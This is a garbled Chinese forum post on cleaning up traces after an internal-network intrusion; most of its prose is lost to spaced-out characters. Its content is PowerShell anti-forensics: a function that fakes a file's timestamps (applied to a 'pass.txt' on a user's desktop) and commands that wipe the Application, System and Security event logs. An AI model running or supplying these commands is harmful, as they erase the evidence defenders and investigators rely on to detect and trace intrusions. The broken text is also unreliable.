[20551] 2021-03-22_内网渗透结束后,一些痕迹清理的小手段

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2021-03-22_内网渗透结束后,一些痕迹清理的小手段 K h a n   2 0 2 1 - 0 3 - 2 2         5 1   P o w e r s h e l l   线 怀   . F u n c t i o n   e d i t _ t i m e ( $ p a t h ) { $ d a t e 1   = G e t - C h i l d I t e m   |   S e l e c t   L a s t W r i t e T i m e | G e t - R a n d o m ; $ d a t e 2   = G e t - C h i l d I t e m   | S e l e c t   L a s t W r i t e T i m e | G e t - R a n d o m ; $ d a t e 3   = G e t - C h i l d I t e m   | S e l e c t   L a s t W r i t e T i m e | G e t - R a n d o m ; $ ( G e t - I t e m   $ p a t h ) . l a s t a c c e s s t i m e = $ d a t e 1 . L a s t W r i t e T i m e ; $ ( G e t - I t e m   $ p a t h ) . c r e a t i o n t i m e = $ d a t e 2 . L a s t W r i t e T i m e   ; $ ( G e t - I t e m   $ p a t h ) . l a s t w r i t e t i m e = $ d a t e 3 . L a s t W r i t e T i m e } ; e d i t _ t i m e ( " C : U s e r s s a u l G o o d m a n D e s k t o p p a s s . t x t " )
P o w e r s h e l l     P o w e r s h e l l   P o w e r S h e l l   - C o m m a n d   " &   { C l e a r - E v e n t l o g   - L o g   A p p l i c a t i o n , S y s t e m , S e c u r i t y } " G e t - W i n E v e n t   - L i s t L o g   A p p l i c a t i o n , S e t u p , S e c u r i t y   - F o r c e   |   %   { W e v t u t i l . e x e   c l   $ _ . L o g n a m e }

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则